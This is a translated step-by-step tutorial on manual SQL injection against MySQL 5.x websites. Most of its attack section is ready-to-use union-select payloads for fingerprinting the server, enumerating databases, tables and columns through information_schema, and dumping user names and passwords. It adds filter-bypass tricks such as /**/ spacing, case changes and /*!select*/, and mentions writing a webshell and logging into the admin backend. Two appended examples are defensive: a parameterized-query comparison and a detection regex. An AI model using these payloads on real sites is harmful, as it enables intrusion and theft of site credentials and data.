Summary of manual injection for MySQL 5.x

Source: Internet
Author: User

As I understand MySQL injection, the user name and password can be obtained through brute force, blind injection, and error-based injection. When the permissions are sufficient, a webshell can also be written out directly through an SQL statement.

After finding a MySQL injection point, we need to determine the MySQL version. Versions earlier than 4.0 do not support union select (joint) queries. Versions later than 5.0 have a default database, information_schema, which stores information about all databases (such as table names, column names, and the corresponding permissions). Through this database we can query data across databases and enumerate tables and columns. In general, MySQL is newer than 4.0, so we can use joint queries with confidence.
 
MySQL injection generally follows these lines of approach:
1. Check whether the injection point has read and write permissions. If it does, you can directly read the configuration file, user name, and password. When magic_quotes_gpc is off, you can also export a webshell.
// When magic_quotes_gpc is on, ' is converted to \', and the absolute path to export to must be enclosed in single quotes, which makes this painful.
2. When there is no read/write permission, determine the MySQL version. If MySQL 5.0 or above is used, you can dump the user name and password. If MySQL 5.0 or above is used but they cannot be dumped (for example, because the information_schema database is restricted), the user name and password can be obtained through blind injection.
// Blind injection: as I understand it, this is similar to injection against an Access database, where whether the query statement is correct is judged by whether the normal page is returned.
3. Sometimes, because a single parameter may be used in multiple query statements, the number of fields cannot be found or no number is displayed. If MySQL error display is enabled on the server, you can also get what you want to know from the error message through error-based injection.
For now, I am not familiar with the blind and error-based methods, so here I will only briefly introduce dumping content from MySQL 5.x databases.
 
 
Step 1: Determine the injection point
Not much to say here: a single quote, and 1=1, and 1=2.
 
 
Step 2: order by and union select
Use order by to find the number of fields N, then perform a joint query:
and 1=2 union select 1,2,3,4,...,N --
// The leading "and 1=2" makes the original query return an error; alternatively, a single quote can be appended or a "-" placed before the parameter value.
// Unlike Access, "from table name" can be omitted here. The trailing "--" is a comment marker that comments out the rest of the statement to avoid errors; it can be changed to "/*" or left out.
// Access does not support comment markers; MySQL and MSSQL do.
// I won't say more about these two.
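
Why the Step 1 and Step 2 probes behave as described, and what removes that behavior: the added example below (not from the original article) builds the same query once by string concatenation and once with an allowlist check plus a bound parameter. It assumes a constructed four-column news table and uses Python's sqlite3 as a stand-in for MySQL, so sqlite_version() takes the place of version(); all function names are hypothetical.

```python
import re
import sqlite3

def make_db() -> sqlite3.Connection:
    # Constructed schema and row; SQLite stands in for MySQL here.
    db = sqlite3.connect(":memory:")
    db.executescript("""
        CREATE TABLE news(id INTEGER, title TEXT, body TEXT, author TEXT);
        INSERT INTO news VALUES (1, 'Hello', 'First post', 'alice');
    """)
    return db

def get_news_vulnerable(db, news_id: str):
    # The parameter is pasted into the SQL text, so "and 1=2 union select ..."
    # is parsed as SQL and a 4-column union lines up with this SELECT.
    sql = "SELECT id, title, body, author FROM news WHERE id = " + news_id
    return db.execute(sql).fetchall()

def get_news_safe(db, news_id: str):
    # 1) Allowlist: the id must be a short run of ASCII digits.
    if not re.fullmatch(r"[0-9]{1,9}", news_id):
        return []
    # 2) Bind the value: it travels as data and is never parsed as SQL.
    sql = "SELECT id, title, body, author FROM news WHERE id = ?"
    return db.execute(sql, (int(news_id),)).fetchall()

def compare(news_id: str):
    """Return (vulnerable_rows, safe_rows) for the same input."""
    db = make_db()
    return get_news_vulnerable(db, news_id), get_news_safe(db, news_id)

if __name__ == "__main__":
    for probe in ("1", "1 and 1=1", "1 and 1=2",
                  "1 and 1=2 union select 1,2,sqlite_version(),4 --"):
        print(repr(probe), compare(probe))
```

With concatenation, "and 1=1" and "and 1=2" return different pages, which is the signal Step 1 relies on; with the bound parameter every probe returns the same empty result.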
 
 
Step 3: Find basic information
Once the displayed position is known, replace the number at that position with the information we want to query. For example, if the displayed position is 3:
and 1=2 union select 1,2,version(),4,...,N --
// Several common functions:
1. version() -- MySQL version
2. user() -- user name
3. database() -- database name
4. @@datadir -- database path
5. @@version_compile_os -- operating system version
Placing one of these in the displayed position returns the corresponding information.
// Several useful functions:
1. concat(str1, str2, ...) -- concatenates strings without a separator
2. concat_ws(separator, str1, str2, ...) -- concatenates strings with a separator
3. group_concat(str1, str2, ...) -- concatenates all strings in a group, separating each row's data with commas
This is abstract and does not need to be understood in detail. With any of these three functions, all of the information above can be retrieved at once.
For example: concat(version(),0x3a,user(),0x3a,database(),0x3a,@@datadir,0x3a,@@version_compile_os)
concat_ws(0x3a,version(),user(),database(),@@datadir,@@version_compile_os)
group_concat(version(),0x3a,user(),0x3a,database(),0x3a,@@datadir,0x3a,@@version_compile_os)
// 0x3a is the hexadecimal form of ":". It is used here as a separator; without it, the returned items run together.
// Some errors may occur in actual queries. For example, @@version_compile_os often fails.
// For MySQL functions, search Baidu or consult the official MySQL manual: http://dev.mysql.com/doc/
 
 
Step 4: Dump tables, columns, and the user name and password
There are many ways to dump the data. I will go through the ones I know, from the most "gentle" to the most "brutal".
 
First: look up tables and columns
1. and 1=2 union select 1,2,table_name,4 from (select * from information_schema.tables where table_schema=<database name in hex> limit N,1) t limit 1 --
2. and 1=2 union select 1,2,column_name,4 from (select * from information_schema.columns where table_name=<table name in hex> and table_schema=<database name in hex> limit N,1) t limit 1 --
3. and 1=2 union select 1,2,<column name>,4 from <table name>
 
// Change the value of N to step through the table names and column names.
// This method is relatively old, and I do not understand the specific principles behind it, especially the t and the trailing limit 1. It is enough to know that it exists.
 
Second: advanced lookup
1. and 1=2 union select 1,2,schema_name,4 from information_schema.schemata limit N,1
2. and 1=2 union select 1,2,table_name,4 from information_schema.tables where table_schema=<database name in hex> limit N,1
3. and 1=2 union select 1,2,column_name,4 from information_schema.columns where table_name=<table name in hex> limit N,1
 
// A shortcut: in place of the hex-encoded name of the database to be queried, use database(), that is, table_schema=database(), which refers directly to the current database.
// Look for sensitive tables, such as those whose names contain admin, manage, or user.
 
Third: dump tables and columns
1. and 1=2 union select 1,2,group_concat(schema_name),4 from information_schema.schemata
2. and 1=2 union select 1,2,group_concat(table_name),4 from information_schema.tables where table_schema=<hex of the database name to be dumped>
3. and 1=2 union select 1,2,group_concat(column_name),4 from information_schema.columns where table_name=<hex of the table name to be dumped>
4. and 1=2 union select 1,2,group_concat(<column name 1>,0x3a,<column name 2>),4 from <table name>
// distinct removes duplicate values from the result. It is optional.
// With the group_concat() function, this method returns all database names, table names, column names, and field contents at once, which is faster and easier to search.
 
Fourth: advanced dumping of tables and columns
1. and 1=2 union select 1,2,group_concat(distinct table_schema),4 from information_schema.columns
2. and 1=2 union select 1,2,group_concat(distinct table_name),4 from information_schema.columns where table_schema=<hex of the database name to be dumped>
3. and 1=2 union select 1,2,group_concat(distinct column_name),4 from information_schema.columns where table_name=<hex of the table name to be dumped>
4. and 1=2 union select 1,2,group_concat(<column name 1>,0x3a,<column name 2>),4 from <table name>
 
// Here all the data is obtained from the information_schema.columns table. From the introduction to the information_schema database (http://dev.mysql.com/doc/refman/5.1/zh/information-schema.html) we can see that information_schema.columns contains the table_schema, table_name, and column_name columns, so this one table can provide all the information we need. This saves the step of switching tables and speeds things up further.
 
At this point the injection itself is complete; what remains is to decrypt the password and find the admin backend to log in. Let me say a few more words.
MySQL injection is very flexible. I have only summarized the most basic statements, which barely scratches the surface. For more advanced material, go to the forums and Baidu. For example, if the preceding statements fail and the cause cannot be identified, we can try these methods:
1. When union select 1,2,3,4 shows no displayed number, replace all the numbers with null, then try replacing them one by one with numbers or characters, or directly with version(), to find one that is displayed. This seems to be due to the differing types of the corresponding variables.
2. Sometimes errors occur inexplicably (for example, a number is displayed, but replacing it with a function such as version() returns a blank page or an error). When nothing can be dumped, try to work around possible encoding problems with functions such as hex() or convert(), for example hex(version()), unhex(hex(version())), convert(version() using latin1), and so on.
3. During injection, spaces can be replaced with "+" or "/**/", which are equivalent. A space is automatically converted to "%20", which looks messy, and after the change it seems that some filtering can be bypassed.
4. In addition, when a website filters input, consider changing letter case, which is why injection statements often look strange and unpredictable. Recently I saw another unusual bypass method, /*!select*/: put the easily filtered keyword inside /*!XXX*/ and the query still runs normally, that is, /*!select*/ = select. If that is not enough, it can also be written as /*!SEleCt*/. I still don't understand the principle behind /*!XXX*/ = XXX. I hope an expert can explain this to me.
 
PS: From now on, just use the last method; the first three are only for understanding.
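
For defenders, the probes in Steps 1 to 4 and the filter-evasion variants in items 3 and 4 above become detectable once a request is normalized before matching. The following Python code is an added example, not part of the original article; the rule names, function names and sample requests are constructed for illustration.

```python
import re
from urllib.parse import unquote_plus

# Constructed sample request lines (not taken from the original page).
SAMPLE_REQUESTS = [
    "/news.php?id=12",
    "/news.php?id=12+and+1=2+union+select+1,2,version(),4+--",
    "/news.php?id=12/**/AnD/**/1=2/**/UnIoN/**/SeLeCt/**/1,2,"
    "group_concat(table_name),4/**/from/**/information_schema.tables",
    "/news.php?id=12%20and%201=2%20/*!UnIoN*/%20/*!SEleCt*/%201,2,3,4",
    "/search.php?q=student+union+elections",
    "/news.php?id=12+order+by+5",
]

# One rule per stage of the procedure, matched on normalized text only.
RULES = {
    "boolean_probe": re.compile(r"\band\s+1\s*=\s*[12]\b"),
    "order_by_probe": re.compile(r"\border\s+by\s+\d+\b"),
    "union_select": re.compile(r"\bunion\s+(?:all\s+)?select\b[^,]*,"),
    "recon_function": re.compile(
        r"\b(?:version|user|database)\s*\(\s*\)"
        r"|@@(?:datadir|version_compile_os)\b"),
    "information_schema": re.compile(
        r"\binformation_schema\s*\.\s*(?:schemata|tables|columns)\b"),
    "concat_dump": re.compile(r"\b(?:group_concat|concat_ws|concat)\s*\("),
}

def normalize(raw: str) -> str:
    # Decode %XX and "+" the way the server does for a query string.
    s = unquote_plus(raw)
    # MySQL executes the body of /*! ... */ comments, so keep the body
    # (dropping an optional version number) instead of discarding it.
    s = re.sub(r"/\*!\d*(.*?)\*/", r" \1 ", s, flags=re.S)
    # Ordinary /* ... */ comments act as whitespace.
    s = re.sub(r"/\*.*?\*/", " ", s, flags=re.S)
    return re.sub(r"\s+", " ", s).lower().strip()

def classify(raw: str) -> list:
    """Return the names of all rules that match the normalized request."""
    text = normalize(raw)
    return [name for name, rx in RULES.items() if rx.search(text)]

if __name__ == "__main__":
    for req in SAMPLE_REQUESTS:
        print(classify(req), req)
```

Matching on the raw request would miss the third and fourth samples; after normalization they hit the same rules as the plain form.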
